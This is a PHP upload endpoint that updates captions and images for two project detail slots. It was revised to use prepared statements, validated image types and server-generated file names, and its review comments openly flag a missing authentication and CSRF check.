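<?php
/**
 * Form endpoint that updates the two detail slots (pd_no 1 and 2) of a project.
 *
 * Request (POST):
 *   q            project id (integer), matched against projects.p_id and
 *                project_details.p_pd_id
 *   text_image1  caption for slot 1 (optional)
 *   text_image2  caption for slot 2 (optional)
 *   file1/file2  replacement image for slot 1 / slot 2 (optional)
 *
 * Response: prints 1 when both slots were processed successfully, 0 otherwise.
 *
 * Changes from the previous revision, all in how untrusted input is handled:
 *   - every query is a prepared statement; the id and captions were
 *     concatenated into the SQL text before
 *   - the stored file name no longer contains the client-supplied name; the
 *     extension is derived from the detected image type, so a request cannot
 *     choose the extension of a file written under the web root
 *   - an empty file field (UPLOAD_ERR_NO_FILE) is treated as a caption-only
 *     update instead of deleting the current picture
 *   - the old picture is removed only after the new file is stored and the
 *     row is updated
 *   - the unused `pro_name` field is no longer read
 *
 * Assumes $conn (created by config.php) is a mysqli connection; the original
 * code called ->query() and ->fetch_assoc() on it. TODO confirm.
 */

include('../config/config.php');

// NOTE(review): nothing in this file checks that the caller is logged in, is
// allowed to edit this project, or sent a valid CSRF token. Confirm that
// config.php (or the web server) enforces this; if not, add the check here,
// because this endpoint writes files, deletes files and modifies rows.

if (!isset($conn)) {
    echo 0;
    exit;
}

// The id is used as a numeric key; anything that is not an integer is rejected.
$projectId = filter_var($_POST['q'] ?? null, FILTER_VALIDATE_INT);
if ($projectId === false) {
    echo 0;
    exit;
}

// Captions are optional; a missing or non-string value means "not sent".
$readCaption = function ($field) {
    return (isset($_POST[$field]) && is_string($_POST[$field])) ? $_POST[$field] : null;
};
$caption1 = $readCaption('text_image1');
$caption2 = $readCaption('text_image2');

// The project's upload directory is the 32 characters that follow "upload/"
// in projects.p_im_show (same extraction as before; the last row wins).
$uploadDir = null;
$stmt = $conn->prepare('SELECT p_im_show FROM projects WHERE p_id = ?');
if ($stmt !== false) {
    $stmt->bind_param('i', $projectId);
    $stmt->execute();
    $stmt->bind_result($imShow);
    while ($stmt->fetch()) {
        $uploadDir = substr((string) $imShow, 7, 32);
    }
    $stmt->close();
}

// The directory name comes from the database and is placed into a filesystem
// path, so it must not be able to leave ../upload/.
// NOTE(review): assumes directory names are alphanumeric (plus _ and -), e.g.
// an MD5 hex string; widen the pattern if real names differ.
if (!is_string($uploadDir) || preg_match('/^[A-Za-z0-9_-]+$/', $uploadDir) !== 1) {
    $uploadDir = null;
}

// Image types accepted for upload and the extension each one is stored under.
// NOTE(review): the field names suggest image uploads only; extend this map if
// other formats are legitimately used.
$allowedImageTypes = [
    IMAGETYPE_JPEG => 'jpg',
    IMAGETYPE_PNG  => 'png',
    IMAGETYPE_GIF  => 'gif',
];

/**
 * Processes one detail slot and reports whether it succeeded.
 *
 * $slotNo    1 or 2 (project_details.pd_no)
 * $fileField name of the upload field for this slot
 * $text      caption for this slot, or null when none was sent
 */
$updateSlot = function ($slotNo, $fileField, $text) use ($conn, $projectId, $uploadDir, $allowedImageTypes) {
    $upload = $_FILES[$fileField] ?? null;
    $hasUpload = is_array($upload)
        && isset($upload['tmp_name'], $upload['error'])
        && $upload['error'] !== UPLOAD_ERR_NO_FILE;

    if (!$hasUpload) {
        if ($text === null) {
            // Nothing to do for this slot.
            return true;
        }

        $stmt = $conn->prepare('UPDATE project_details SET pd_text = ? WHERE pd_no = ? AND p_pd_id = ?');
        if ($stmt === false) {
            return false;
        }
        $stmt->bind_param('sii', $text, $slotNo, $projectId);
        $ok = $stmt->execute();
        $stmt->close();

        return $ok;
    }

    // Only a single, fully received file that PHP itself stored is accepted.
    if (!is_string($upload['tmp_name'])
        || $upload['error'] !== UPLOAD_ERR_OK
        || !is_uploaded_file($upload['tmp_name'])
        || $uploadDir === null
    ) {
        return false;
    }

    // The extension is chosen from the file's content, never from the name the
    // client sent.
    $imageInfo = getimagesize($upload['tmp_name']);
    if ($imageInfo === false || !isset($allowedImageTypes[$imageInfo[2]])) {
        return false;
    }
    $extension = $allowedImageTypes[$imageInfo[2]];

    // Collect the pictures currently stored for this slot. As before, an upload
    // is only applied when the slot already has a row.
    $oldPaths = [];
    $stmt = $conn->prepare('SELECT im_pd_id FROM project_details WHERE pd_no = ? AND p_pd_id = ?');
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('ii', $slotNo, $projectId);
    $stmt->execute();
    $stmt->bind_result($oldPath);
    while ($stmt->fetch()) {
        $oldPaths[] = (string) $oldPath;
    }
    $stmt->close();
    if ($oldPaths === []) {
        return false;
    }

    // Random, server-generated file name.
    $newPath = 'upload/' . $uploadDir . '/' . bin2hex(random_bytes(16)) . '.' . $extension;
    if (!move_uploaded_file($upload['tmp_name'], '../' . $newPath)) {
        return false;
    }
    // NOTE(review): the upload directory should be served with script
    // execution disabled, as a second layer behind the type check above.

    $textValue = (string) $text;
    $stmt = $conn->prepare(
        'UPDATE project_details SET im_pd_id = ?, pd_text = ? WHERE pd_no = ? AND p_pd_id = ?'
    );
    $ok = false;
    if ($stmt !== false) {
        $stmt->bind_param('ssii', $newPath, $textValue, $slotNo, $projectId);
        $ok = $stmt->execute();
        $stmt->close();
    }
    if (!$ok) {
        // Do not leave an unreferenced file behind when the row was not updated.
        unlink('../' . $newPath);
        return false;
    }

    // Remove replaced pictures. Only paths under upload/ are touched, and paths
    // containing ".." are skipped so a stored value cannot point elsewhere.
    foreach ($oldPaths as $old) {
        if (strncmp($old, 'upload', 6) !== 0 || strpos($old, '..') !== false || $old === $newPath) {
            continue;
        }
        $oldFile = '../' . $old;
        if (file_exists($oldFile)) {
            unlink($oldFile);
        }
    }

    return true;
};

// Both slots are always processed, as in the previous revision.
$slot1Ok = $updateSlot(1, 'file1', $caption1);
$slot2Ok = $updateSlot(2, 'file2', $caption2);

echo ($slot1Ok === true && $slot2Ok === true) ? 1 : 0;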